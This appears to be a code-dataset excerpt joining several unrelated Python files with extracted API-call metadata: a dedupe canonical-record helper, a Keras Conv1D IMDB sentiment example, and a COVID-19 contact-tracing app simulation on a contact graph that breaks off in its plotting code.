np\n'), ((2831, 2864), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (2837, 2864), True, 'import numpy as np\n'), ((2867, 2888), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2873, 2888), True, 'import numpy 
as np\n'), ((2913, 2946), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (2919, 2946), True, 'import numpy as np\n'), ((2949, 2970), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2955, 2970), True, 'import numpy as np\n'), ((2995, 3028), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (3001, 3028), True, 'import numpy as np\n'), ((3031, 3052), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (3037, 3052), True, 'import numpy as np\n'), ((3285, 3312), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (3293, 3312), True, 'import numpy as np\n'), ((4703, 4729), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (4711, 4729), True, 'import numpy as np\n'), ((4760, 4798), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (4768, 4798), True, 'import numpy as np\n'), ((5687, 5720), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (5693, 5720), True, 'import numpy as np\n'), ((5723, 5744), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5729, 5744), True, 'import numpy as np\n'), ((5772, 5805), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (5778, 5805), True, 'import numpy as np\n'), ((5808, 5829), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5814, 5829), True, 'import numpy as np\n'), ((5857, 5890), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (5863, 5890), True, 'import numpy as np\n'), ((5893, 5914), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5899, 5914), True, 'import numpy as np\n'), ((5942, 5975), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (5948, 5975), True, 'import numpy as np\n'), ((5978, 5999), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5984, 5999), True, 'import numpy as np\n'), ((6235, 6262), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (6243, 6262), True, 'import numpy as np\n')]
|
import numpy
from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator
def getCentroid(attribute_variants, comparator):
"""
Takes in a list of attribute values for a field,
evaluates the centroid using the comparator,
& returns the centroid (i.e. the 'best' value for the field)
"""
n = len(attribute_variants)
distance_matrix = numpy.zeros([n,n])
# populate distance matrix by looping through elements of matrix triangle
for i in range (0,n):
for j in range (0, i):
distance = comparator(attribute_variants[i], attribute_variants[j])
distance_matrix[i,j] = distance_matrix[j,i] = distance
average_distance = distance_matrix.mean(0)
# there can be ties for minimum, average distance string
min_dist_indices = numpy.where(average_distance==average_distance.min())[0]
if len(min_dist_indices) > 1:
centroid = breakCentroidTie(attribute_variants, min_dist_indices)
else :
centroid_index = min_dist_indices[0]
centroid = attribute_variants[centroid_index]
return centroid
def breakCentroidTie(attribute_variants, min_dist_indices):
"""
Finds centroid when there are multiple values w/ min avg distance
(e.g. any dupe cluster of 2) right now this selects the first among a set of
ties, but can be modified to break ties in strings by selecting the longest string
"""
return attribute_variants[min_dist_indices[0]]
def getCanonicalRep(record_cluster):
"""
Given a list of records within a duplicate cluster, constructs a canonical representation
of the cluster by finding canonical values for each field
"""
canonical_rep = {}
for key in record_cluster[0].keys():
key_values = []
for record in record_cluster :
# assume non-empty values always better than empty value for canonical record
if record[key]:
key_values.append(record[key])
if key_values:
canonical_rep[key] = getCentroid(key_values, comparator)
else:
canonical_rep[key] = ''
return canonical_rep
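# --- Editor's usage sketch (toy records; not part of the original module) ---
# getCanonicalRep picks, field by field, the non-empty value whose average affine-gap
# distance to the other variants is smallest (ties broken by breakCentroidTie).
if __name__ == "__main__":
    cluster = [
        {'name': 'Jane Doe', 'address': '123 Main St'},
        {'name': 'Jane  Doe', 'address': ''},
        {'name': 'J. Doe', 'address': '123 Main Street'},
    ]
    print(getCanonicalRep(cluster))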
|
[
"dedupe.distance.affinegap.normalizedAffineGapDistance",
"numpy.zeros"
] |
[((391, 410), 'numpy.zeros', 'numpy.zeros', (['[n, n]'], {}), '([n, n])\n', (402, 410), False, 'import numpy\n'), ((573, 629), 'dedupe.distance.affinegap.normalizedAffineGapDistance', 'comparator', (['attribute_variants[i]', 'attribute_variants[j]'], {}), '(attribute_variants[i], attribute_variants[j])\n', (583, 629), True, 'from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator\n')]
|
'''This example demonstrates the use of Convolution1D for text classification.
Gets to 0.89 test accuracy after 2 epochs.
90s/epoch on Intel i5 2.4 GHz CPU.
10s/epoch on Tesla K40 GPU.
'''
from __future__ import print_function
import numpy as np
import keras.callbacks
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.datasets import imdb
from example_correctness_test_utils import TrainingHistory, StopwatchManager
# set parameters:
max_features = 5000
maxlen = 400
batch_size = 32
embedding_dims = 50
filters = 250
kernel_size = 3
hidden_dims = 250
epochs = 2
print('Loading data...')
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
train_input_truncation = 1500
test_input_truncation = 200
x_train = x_train[:train_input_truncation]
y_train = y_train[:train_input_truncation]
x_test = x_test[:test_input_truncation]
y_test = y_test[:test_input_truncation]
print(len(x_train), 'train sequences')
print(len(x_test), 'test sequences')
print('Pad sequences (samples x time)')
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print('x_train shape:', x_train.shape)
print('x_test shape:', x_test.shape)
print('Build model...')
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features, embedding_dims, input_length=maxlen))
model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1))
# we use max pooling:
model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
model.add(Dense(hidden_dims))
model.add(Dropout(0.2))
model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1))
model.add(Activation('sigmoid'))
history = TrainingHistory()
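# Note (editor): stop_watch, compile_stop_watch (next line) and output (at the bottom of the
# script) are not defined in this snippet; they are presumably injected by the surrounding
# correctness-test harness that also provides example_correctness_test_utils.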
sw_manager = StopwatchManager(stop_watch, compile_stop_watch)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(x_train,
y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test),
callbacks=[history, sw_manager])
output.contents = np.array([history.acc, history.loss, history.val_acc, history.val_loss])
|
[
"example_correctness_test_utils.TrainingHistory",
"keras.layers.Activation",
"keras.preprocessing.sequence.pad_sequences",
"keras.layers.Dropout",
"keras.layers.Conv1D",
"example_correctness_test_utils.StopwatchManager",
"keras.layers.Dense",
"numpy.array",
"keras.layers.Embedding",
"keras.models.Sequential",
"keras.layers.GlobalMaxPooling1D",
"keras.datasets.imdb.load_data"
] |
[((809, 847), 'keras.datasets.imdb.load_data', 'imdb.load_data', ([], {'num_words': 'max_features'}), '(num_words=max_features)\n', (823, 847), False, 'from keras.datasets import imdb\n'), ((1201, 1247), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_train'], {'maxlen': 'maxlen'}), '(x_train, maxlen=maxlen)\n', (1223, 1247), False, 'from keras.preprocessing import sequence\n'), ((1257, 1302), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_test'], {'maxlen': 'maxlen'}), '(x_test, maxlen=maxlen)\n', (1279, 1302), False, 'from keras.preprocessing import sequence\n'), ((1412, 1424), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1422, 1424), False, 'from keras.models import Sequential\n'), ((2129, 2146), 'example_correctness_test_utils.TrainingHistory', 'TrainingHistory', ([], {}), '()\n', (2144, 2146), False, 'from example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2160, 2208), 'example_correctness_test_utils.StopwatchManager', 'StopwatchManager', (['stop_watch', 'compile_stop_watch'], {}), '(stop_watch, compile_stop_watch)\n', (2176, 2208), False, 'from example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2494, 2566), 'numpy.array', 'np.array', (['[history.acc, history.loss, history.val_acc, history.val_loss]'], {}), '([history.acc, history.loss, history.val_acc, history.val_loss])\n', (2502, 2566), True, 'import numpy as np\n'), ((1547, 1607), 'keras.layers.Embedding', 'Embedding', (['max_features', 'embedding_dims'], {'input_length': 'maxlen'}), '(max_features, embedding_dims, input_length=maxlen)\n', (1556, 1607), False, 'from keras.layers import Embedding\n'), ((1619, 1631), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1626, 1631), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1739, 1814), 'keras.layers.Conv1D', 'Conv1D', (['filters', 'kernel_size'], {'padding': '"""valid"""', 'activation': '"""relu"""', 'strides': '(1)'}), "(filters, kernel_size, padding='valid', activation='relu', strides=1)\n", (1745, 1814), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1848, 1868), 'keras.layers.GlobalMaxPooling1D', 'GlobalMaxPooling1D', ([], {}), '()\n', (1866, 1868), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1914, 1932), 'keras.layers.Dense', 'Dense', (['hidden_dims'], {}), '(hidden_dims)\n', (1919, 1932), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1944, 1956), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1951, 1956), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1968, 1986), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1978, 1986), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2075, 2083), 'keras.layers.Dense', 'Dense', (['(1)'], {}), '(1)\n', (2080, 2083), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2095, 2116), 'keras.layers.Activation', 'Activation', (['"""sigmoid"""'], {}), "('sigmoid')\n", (2105, 2116), False, 'from keras.layers import Dense, Dropout, Activation\n')]
|
from IPython import get_ipython
# %%
####################
# GRAPH GENERATION #
####################
# TODO: remove duplicate of nbIndividuals in viz
nbIndividuals = 1000 # number of people in the graph | nombre d'individus dans le graphe
initHealthy = 0.85 # proportion of healthy people at start | la proportion de personnes saines à l'intant initial
initCured = 0.1 # proportion of cured people at start | proportion de personnes guéries à l'instant initial
# The other people are 60% presymptomatic and 40% asymptomatic at start | Les autres personnes sont 40% d'asymptomatiques et 60% de présymptomatiques au départ
# graph generation for exponential degrees distribution
#------------------------------------------------------
deg_avg = 100 # average number of connexions per person | le nombre moyen de connexions par personne
av_household_size = 6 # average size of household | la taille moyenne d'un foyer
household_proba = 1 # probability of meeting a person of the same household | la probabilité de contact par jour entre membres d'un même foyer
extern_contact_proba = 0.3 # probabilty of meeting a person of a different household | la probabilité de contact par jour entre personne de foyers différents
# average contacts per day = 0.3*(100-6) + 1*6 = 34.2
# graph generation with organization in households
#-------------------------------------------------
household_size = (3, 5) # min and max size of an household (uniform distribution) | extremums de la taille d'un foyer
household_link = 1 # probability of contact between members of a household | proba de contact entre membres d'un foyer
number_of_households = 300 # 2500 is good but a bit slow | number of households in the community | nombre de foyers dans une communauté
community_link = 0.3 # probability of contact across households | proba de contact entre foyers
av_deg_by_household = 400 # number of link from a household | nombre moyen de liens depuis un foyer
# average external degree of an individual : 400/4 (4 is the average size of an household)
# average contacts per day = (400/4)*0.3 + 4 = 34
##############
# APP PARAMS #
##############
daysNotif = 0 # number of days the app checks back for contact notification | nombre de jours vérifiés par l'appli pour notifier un contact
utilApp = 0.8 # percentage of people having the app | la proportion d'utilisateurs de l'application dans la population générale
pDetection = 0.9 # prob. that the app detects a contact | proba que l'appli détecte un contact
pReport = 0.9 # prob. that a user reports his symptoms | proba qu'un utilisateur alerte de ses symptômes
pReadNotif = 0.8 # probablity of taking a notification into account (ask for a test, quarantine) | proba de prendre en compte une notification (demande de test, quarantaine)
pSymptomsNotCovid = 0.005 # every day, everyone sends a notification with prob. pSymptomsNotCovid | chaque jour, tout le monde envoie une notif avec proba PSymptomsNotCovid
############
# POLICIES #
############
# people warn the app immediately after having symptoms | on prévient l'application directement après avoir développé les symptômes
warningAfterSymptoms = False
# upon notification, an individual asks for a test (with some prob.)
# if true, user waits for test results in quarantine, else he goes in quarantine only upon reception of positive test results
# |
# à la reception d'une notif, l'utilisateur demande un test (avec une certaine proba)
# si vrai, il attend les résultats en quarantaine, sinon il ne se met en quarantaine qu'aux résultats d'un test positif
quarantineAfterNotification = True
###############
# TEST PARAMS #
###############
testWindow = (3, 10) # tests are only effective in a given window (time since infection) | les tests ne sont efficaces que dans une fenêtre de temps après infection
daysUntilResult = 2 # waiting time for test results | attente pour l'obtention des résultats
pFalseNegative = 0.15 # prob. of false negative | proba d'avoir un faux négatif
daysBetweenTests = 0
##############
# QUARANTINE #
##############
pQSymptoms = 0.9 # probability of going into quarantine when one has symptoms | proba de confinement lors de détection des symptômes
quarantineFactor = 100 # reduction factor applied to the probabilities when one is in quarantine | réduction des probas de rencontre lors du confinement
daysQuarantine = 14 # duration of the quarantine | durée de la quarantaine
#################
# PROBABILITIES #
#################
# !! Probabilities are given for 1 step of the process, thus overall prob. follows a geometric law for which expected values have been calculated
# paramters estimated -> a limit of the model
pCloseContact = 0.375 # prob. that a contact is a close contact (those detected by the app) | proba qu'un contact soit rapproché (ceux détectés par l'appli)
pContaminationCloseContact = 0.02 # prob. of contamination after close contact with an infected person | proba de contamination après contact rapproché avec qqn d'infecté
#according to https://www.who.int/docs/default-source/coronaviruse/who-china-joint-mission-on-covid-19-final-report.pdf -> around 1 to 5% of close contact lead to virus transmission
pContaminationCloseContactAsymp = 0.006
# infectiousness of asymptomatic people appears to be very low according to [4] and "Temporal dynamics in viral shedding and transmissibility of COVID-19" [6]
pContaminationFar = 0.001 # prob. of contamination upon non close contact (environmental or short contact) | proba de contamination par contact environnemental ou bref
pContaminationFarAsymp = 0.0003
# we took R0=2 estimate from [4] and : 34 contacts/day, an average time of infectiousness of 10 days (pre symptomatic + begining of symptoms period)
#average number of infected by symptomatic : (0.375*0.02+0.625*0.001)*34*10 = 2.76
#average number of infected by asymptomatic : (0.375*0.006+0.625*0.0003)*34*10 = 0.83
# this gives 0.6*2.76 + 0.4*0.83 = 1.99 persons infected in average by an infected
# this is plausible given the estimate of R0 and the fact that asymptomatic contamination appears to be minor
# [4] and [6]
# and (0.6*0.625*0.001 + 0.4*0.625*0.0003)*34*10 / R0 = 0.0765 -> the proportion of contaminations which are not due to close contact (environmental / short contact) (contaminations by asymptomatic people are neglected) estimated according to environmental contamination estimate in [4]
# thus most infections (92%) are susceptible to be noticed by the app
# -> the proportion of contaminations by asympt. people is : 0.4*0.83/(0.6*2.76 + 0.4*0.0.83) = 0.17 plausible according to the presumed low infectiosity shown in [4], but this is a conservative estimate (not the 0.06 given by this paper) given the high uncertainty around the results
pAsympt = 0.4 # probability of being asymptomatic when infected | proba qu'une personne infectée soit asymptomatique
# according to [4] and Diamond Princess estimates
# parameters for the lognormal law of the incubation period | paramètres pour la loi lognormale de la période d'incubation
incubMeanlog = 1.644 # -> ~5.5 days
incubSdlog = 0.363 # -> ~2.1 days
# according to [4]
pAtoG = 0.1 # probability of going from asymptomatic state to cured | proba de passer de asymptomatique à guéri
# according to "Clinical characteristics of 24 asymptomatic infections with COVID-19 screened among close contacts in Nanjing, China" [7]
pIStoC = 0.07 # probability of going from symptomatic state to cured | proba de passer de avec symptômes à gueri
pIStoD = 0.003 # probability of dying when symptomatic | proba de décès d'une personne présentant des symptômes
# average time with symptoms : 1/(0.07+0.003) = 13.7 days : plausible according to [4]
# death rate when symptoms : 0.003/0.07 = 4.3% : plausible in France according to estimate of 1.6M cases with symptoms and 6 000 deaths the 3 April
# https://www.mgfrance.org/publication/communiquepresse/2525-enquete-mg-france-plus-d-un-million-et-demi-de-personnes-prises-en-charge-par-leur-medecin-generaliste-pour-le-covid-19-entre-le-17-mars-et-le-3-avril
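# --- Editor's sketch: numeric check of the R0 reasoning above (not part of the original model) ---
# Reproduces the back-of-the-envelope arithmetic from the comments: with ~34 contacts/day and
# ~10 infectious days, the expected number of secondary cases per index case is a weighted sum
# of the close-contact and environmental transmission probabilities. Call it manually if needed.
def check_r0_arithmetic(contacts_per_day=34, infectious_days=10):
    r_symp = (pCloseContact * pContaminationCloseContact
              + (1 - pCloseContact) * pContaminationFar) * contacts_per_day * infectious_days
    r_asymp = (pCloseContact * pContaminationCloseContactAsymp
               + (1 - pCloseContact) * pContaminationFarAsymp) * contacts_per_day * infectious_days
    r_avg = (1 - pAsympt) * r_symp + pAsympt * r_asymp
    return r_symp, r_asymp, r_avg  # ~2.76, ~0.83, ~1.99, matching the figures quoted above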
# # Libs and defs
# Librairies
import random
import numpy as np
# -> sliders
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
HEALTHY = 0
ASYMP = 1
PRESYMP = 2
SYMP = 3
CURED = 4
DEAD = 5
class Graph:
""" Object holding the representation of the graph and some metrics """
def __init__(self):
self.individuals = []
self.adj = []
self.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)]
self.nbHealthy = 0 # number of healthy people
self.nbAS = 0 # number of asymptomatic people
        self.nbPS = 0 # number of presymptomatic people
self.nbS = 0 # number of symptomatic people
self.nbCured = 0 # number of cured persons
self.nbDead = 0 # number of deceased people
self.nbQuarantineI = 0 # number of infected people in quarantine
self.nbQuarantineNonI = 0 # number of non infected people in quarantine
self.nbTest = 0 # number of tests made
# cumulative counters :
self.nbQuarantineTotal = 0 # number of people in quarantine
self.nbInfectedByASPS = 0 # number of people infected by asymp. + presymp. people
#to compute Rt
self.stepNb = 0
self.contaminations = [] # number of people contaminated at a given time
self.numInfectedByNewInfected = [] # total number of people who will get infected by people contaminated at a given time
class Individual:
""" Object holding the representation of an individual """
def __init__(self, state, daysQuarantine, app, sentNotification, daysIncubation, timeSinceInfection, timeLeftForTestResult):
self.state = state
self.daysQuarantine = daysQuarantine
self.app = app
self.sentNotification = sentNotification
self.daysIncubation = daysIncubation
self.timeSinceInfection = timeSinceInfection
self.timeSinceLastTest = np.inf # we don't want to test people too often
self.timeLeftForTestResult = timeLeftForTestResult
self.nbInfected = 0
def in_state(self, state):
return self.state == state
def is_infected(self):
return self.state in [PRESYMP, ASYMP, SYMP]
def has_no_covid(self):
return self.state in [HEALTHY, CURED]
def in_quarantine(self):
return self.daysQuarantine > 0
def go_quarantine(self):
if self.daysQuarantine <= 0:
self.daysQuarantine = daysQuarantine # goes into quarantine if isn't already
# # Graph generation
def create_individuals(graph):
graph.contaminations.append(0)
for i in range(nbIndividuals):
app = False
if random.uniform(0,1) < utilApp:
app = True
s = PRESYMP
time_since_infection = -1
incub = 0
r = random.random()
if r < initHealthy:
s = HEALTHY
graph.nbHealthy += 1
elif r < initHealthy + initCured:
s = CURED
graph.nbCured += 1
else:
graph.contaminations[0] += 1 # we start as if a proportion of the population just got infected
time_since_infection = 0
if random.random() < pAsympt:
s = ASYMP
graph.nbAS += 1
else:
s = PRESYMP
incub = round(np.random.lognormal(incubMeanlog, incubSdlog))
graph.nbPS += 1
# state, quarantine, app, notif, incubation, timeSinceInfection, timeLeftForTestResult
graph.individuals.append(Individual(s, 0, app, False, incub, time_since_infection, -1))
def init_graph_exp(graph):
""" Graph initialisation based on exponential ditribution of degrees """
create_individuals(graph)
# affecting degrees to vertices
degrees = np.around(np.random.exponential(deg_avg, nbIndividuals))
# to get an even number of total degrees
S = sum(degrees)
if S%2 == 1:
degrees[0] += 1
S += 1
graph.adj = [[] for i in range(nbIndividuals)]
while S > 0:
# creating an edge
[p1, p2] = np.random.choice(len(degrees), 2, replace=False, p=degrees/S)
if degrees[p1] <= av_household_size or degrees[p2] <= av_household_size:
# the last edges created are edges within households
graph.adj[p1].append({"node" : p2, "proba" : household_proba})
graph.adj[p2].append({"node" : p1, "proba" : household_proba})
else:
graph.adj[p1].append({"node" : p2, "proba" : extern_contact_proba})
graph.adj[p2].append({"node" : p1, "proba" : extern_contact_proba})
degrees[p1] -= 1
degrees[p2] -= 1
S -= 2
def init_graph_household(graph):
""" Graph generation based on households organisation """
global nbIndividuals
# creation of the households
graph.adj = []
for i in range(number_of_households):
size = random.randint(household_size[0], household_size[1])
nb = len(graph.adj)
for i in range(nb, nb+size):
household = []
for j in range(nb, nb+size):
if (i != j):
household.append({"node": j, "proba": household_link})
graph.adj.append(household)
# linkage of the households
for i in range(av_deg_by_household*number_of_households):
[p1, p2] = np.random.choice(len(graph.adj), 2, replace=False)
graph.adj[p1].append({"node": p2, "proba": community_link})
graph.adj[p2].append({"node": p1, "proba": community_link})
nbIndividuals = len(graph.adj)
create_individuals(graph)
graph.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)]
# # Updating the graph
def contamination(graph, i, j, closeContact):
""" Individuals i and j have come into contact, leading to a possible contamination | Les individus i et j sont entrés en contact, une contamination est possible """
if graph.individuals[i].state == graph.individuals[j].state:
return
if graph.individuals[i].in_state(HEALTHY):
contamination(graph, j, i, closeContact)
return
# i is the infected individual
if graph.individuals[i].is_infected():
if graph.individuals[j].in_state(HEALTHY):
if closeContact:
pContamination = pContaminationCloseContact
pContaminationAsymp = pContaminationCloseContactAsymp
else:
pContamination = pContaminationFar
pContaminationAsymp = pContaminationFarAsymp
if (random.random() < pContamination and (not graph.individuals[i].in_state(ASYMP))) or \
(random.random() < pContaminationAsymp and graph.individuals[i].in_state(ASYMP)):
# j becomes infected
# for Rt computation
graph.contaminations[graph.stepNb] += 1
graph.numInfectedByNewInfected[graph.stepNb - graph.individuals[i].timeSinceInfection] += 1 # parent infection took place timeSinceInfection ago
if graph.individuals[i].in_state(ASYMP) or graph.individuals[i].in_state(PRESYMP):
graph.nbInfectedByASPS += 1
graph.individuals[j].timeSinceInfection = 0
graph.individuals[i].nbInfected += 1 # i has infected one more person
graph.nbHealthy -= 1
if random.random() < pAsympt:
graph.individuals[j].state = ASYMP
graph.nbAS += 1
else:
graph.individuals[j].state = PRESYMP
graph.individuals[j].daysIncubation = round(np.random.lognormal(incubMeanlog, incubSdlog))
graph.nbPS += 1
def test_individual(individual, graph):
# if there is a test incoming, the person is not tested again
if individual.timeLeftForTestResult >= 0 or individual.in_state(DEAD):
return
# the person was tested not long ago
if individual.timeSinceLastTest < daysBetweenTests:
return
# the person is tested
individual.timeSinceLastTest = 0
graph.nbTest += 1
individual.timeLeftForTestResult = daysUntilResult
if individual.has_no_covid():
individual.latestTestResult = False # we assume that there are no false positives
return
if individual.timeSinceInfection < testWindow[0] or individual.timeSinceInfection > testWindow[1]:
individual.latestTestResult = False # not in the detection window, the test fails
return
# otherwise the person is ill
# the test result depends whether we have a false negative or not
individual.latestTestResult = not (random.random() < pFalseNegative)
def send_notification(graph, i):
""" Send notification to people who have been in touch with i | Envoi d'une notif aux personnes ayant été en contact avec i """
if graph.individuals[i].sentNotification:
return # notifications already sent
graph.individuals[i].sentNotification = True
for daysEncounter in graph.encounters[i]:
# note: graph.encounter[i] is empty if i does not have the app so there is no need to have an additional condition
for contact in daysEncounter:
if random.random() < pReadNotif: # if the person takes the notification into account
# the person is always tested (TODO: change this ?)
test_individual(graph.individuals[contact], graph) # asks for a test
if quarantineAfterNotification: # in this case, the person waits for test results in quarantine
graph.individuals[contact].go_quarantine()
def make_encounters(graph, i):
""" Assess all encounters made by i in one day | Détermine toutes les rencontres faites par i en un jour """
for edge in graph.adj[i]:
j = edge['node']
if j < i:
continue # only check one way of the edge | on ne regarde qu'un sens de chaque arête
# if i and/or j are in quarantine, reduce the probability that they meet | si i et/ou j sont confinés, réduction de leur proba de rencontre
factor = 1
if graph.individuals[i].in_quarantine():
factor *= quarantineFactor
if graph.individuals[j].in_quarantine():
factor *= quarantineFactor
if random.random() < edge['proba'] / factor:
if random.random() < pCloseContact: # if this is a close contact
# if i and j have the app, we save their encounter | si i et j ont l'appli, on note la rencontre
if graph.individuals[i].app and graph.individuals[j].app and random.random() < pDetection: # contact detections are symmetric in our model
graph.encounters[i][-1].append(j)
graph.encounters[j][-1].append(i)
contamination(graph, i, j, True)
else:
contamination(graph, i, j, False)
def step(graph):
""" Step from a day to the next day | Passage au jour suivant du graphe """
graph.nbTest = 0
for encounter in graph.encounters:
encounter.append([]) # will contain every encounter of the day | contiendra les nouvelles rencontres du jour
graph.contaminations.append(0)
graph.numInfectedByNewInfected.append(0)
## go through each possible encounter | on constate toutes les rencontres entre individus
for i in range(nbIndividuals):
make_encounters(graph, i)
## update the states | on met à jour les états des individus
for i, individual in enumerate(graph.individuals):
if individual.in_state(ASYMP):
if random.random() < pAtoG:
graph.nbAS -= 1
graph.nbCured += 1
individual.state = CURED
elif individual.in_state(PRESYMP):
if individual.daysIncubation == 0: # the person develops symptoms
graph.nbPS -= 1
graph.nbS += 1
individual.state = SYMP
# send the notifications (encounters[i] is empty if i doesn't have the app) | envoi des notifs (encounters[i] vide si i n'a pas l'appli)
if random.random() < pReport and warningAfterSymptoms:
send_notification(graph, i)
if random.random() < pQSymptoms: # go into quarantine if symptoms appear | mise en confinement à la détection des symptômes
individual.go_quarantine()
test_individual(individual, graph) # all individuals developing symptoms are tested (TODO: add prob. to parameters ?)
elif individual.in_state(SYMP):
action = random.random()
if action < pIStoC:
graph.nbS -= 1
graph.nbCured += 1
individual.state = CURED
elif action > 1 - pIStoD:
graph.nbS -= 1
graph.nbDead += 1
individual.state = DEAD
# if warningAfterSymptoms is True, each individual has a probability of sending a false notification due to symptoms that are misinterpreted as from COVID-19
# | si warningAfterSymptoms est vrai, chaque individu a une probabilité d'envoyer une notification en raison de symptômes faussement perçus comme relevant du COVID-19
if warningAfterSymptoms and random.random() < pSymptomsNotCovid:
send_notification(graph, i)
# reception of test results | réception des résultats de test
if individual.timeLeftForTestResult == 0:
if individual.in_quarantine() and individual.latestTestResult == False: # is in quarantine and gets a negative test
individual.daysQuarantine = 0 # end of quarantine
if individual.latestTestResult == True:
individual.go_quarantine()
individual.timeLeftForTestResult = np.inf # people tested positive are not tested again
if random.random() < pReport: # not everyone reports a positive test to the app
send_notification(graph, i)
individual.app = False # unsubscribe from the app in order to not consider new notifications
individual.timeLeftForTestResult -= 1
## results of the day | bilan du jour
graph.nbQuarantineNonI = 0
graph.nbQuarantineI = 0
for individual in graph.individuals:
if individual.in_state(DEAD):
continue
individual.daysQuarantine -= 1
individual.daysIncubation -= 1
individual.timeSinceLastTest += 1
# if there are still symptoms we don't end the quarantine
if (not individual.in_quarantine()) and individual.in_state(SYMP):
individual.daysQuarantine = 1
if individual.in_quarantine():
graph.nbQuarantineTotal += 1/nbIndividuals
if not individual.is_infected():
graph.nbQuarantineNonI += 1
else:
graph.nbQuarantineI += 1
if individual.timeSinceInfection >= 0:
individual.timeSinceInfection += 1
## deleting oldest recorded day | suppression du plus vieux jour de l'historique
for encounter in graph.encounters:
encounter.pop(0)
graph.stepNb += 1
# # Display
# Interactive model below (it takes about 10-15 sec to appear and to run a simulation)
# ! uncomment for the notebook version :
# %matplotlib notebook
import matplotlib.pyplot as plt
fig, ((ax, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize=[15,10])
axRt = ax3.twinx()
xs = []
y_D = []
y_MS = []
y_MPS = []
y_MAS = []
y_S = []
y_G = []
y_Q = []
y_InfectByASPS = []
y_QuarantineNonI = []
y_QuarantineI = []
y_QuarantineNonITotal = []
y_Test = []
y_TestTotal = []
y_Rt = []
ax.set_ylim([0, nbIndividuals])
def update_viz(graph):
if y_QuarantineNonITotal != []:
y_QuarantineNonITotal.append((graph.nbQuarantineNonI + nbIndividuals*y_QuarantineNonITotal[-1])/nbIndividuals)
y_TestTotal.append((graph.nbTest + nbIndividuals*y_TestTotal[-1])/nbIndividuals)
else:
y_QuarantineNonITotal.append(graph.nbQuarantineNonI/nbIndividuals)
y_TestTotal.append(graph.nbTest/nbIndividuals)
xs.append(len(xs))
y_D.append(graph.nbDead/nbIndividuals*100)
y_MS.append(graph.nbS/nbIndividuals*100)
y_MPS.append(graph.nbPS/nbIndividuals*100)
y_MAS.append(graph.nbAS/nbIndividuals*100)
y_S.append(graph.nbHealthy/nbIndividuals*100)
y_G.append(graph.nbCured/nbIndividuals*100)
y_Q.append(graph.nbQuarantineTotal)
y_InfectByASPS.append(graph.nbInfectedByASPS)
y_QuarantineNonI.append(graph.nbQuarantineNonI/nbIndividuals*100)
y_QuarantineI.append(graph.nbQuarantineI/nbIndividuals*100)
y_Test.append(graph.nbTest/nbIndividuals*100)
def draw_viz(graph):
ax.clear()
ax2.clear()
ax3.clear()
ax4.clear()
axRt.clear()
ax.set_xlabel("Days")
ax2.set_xlabel("Days")
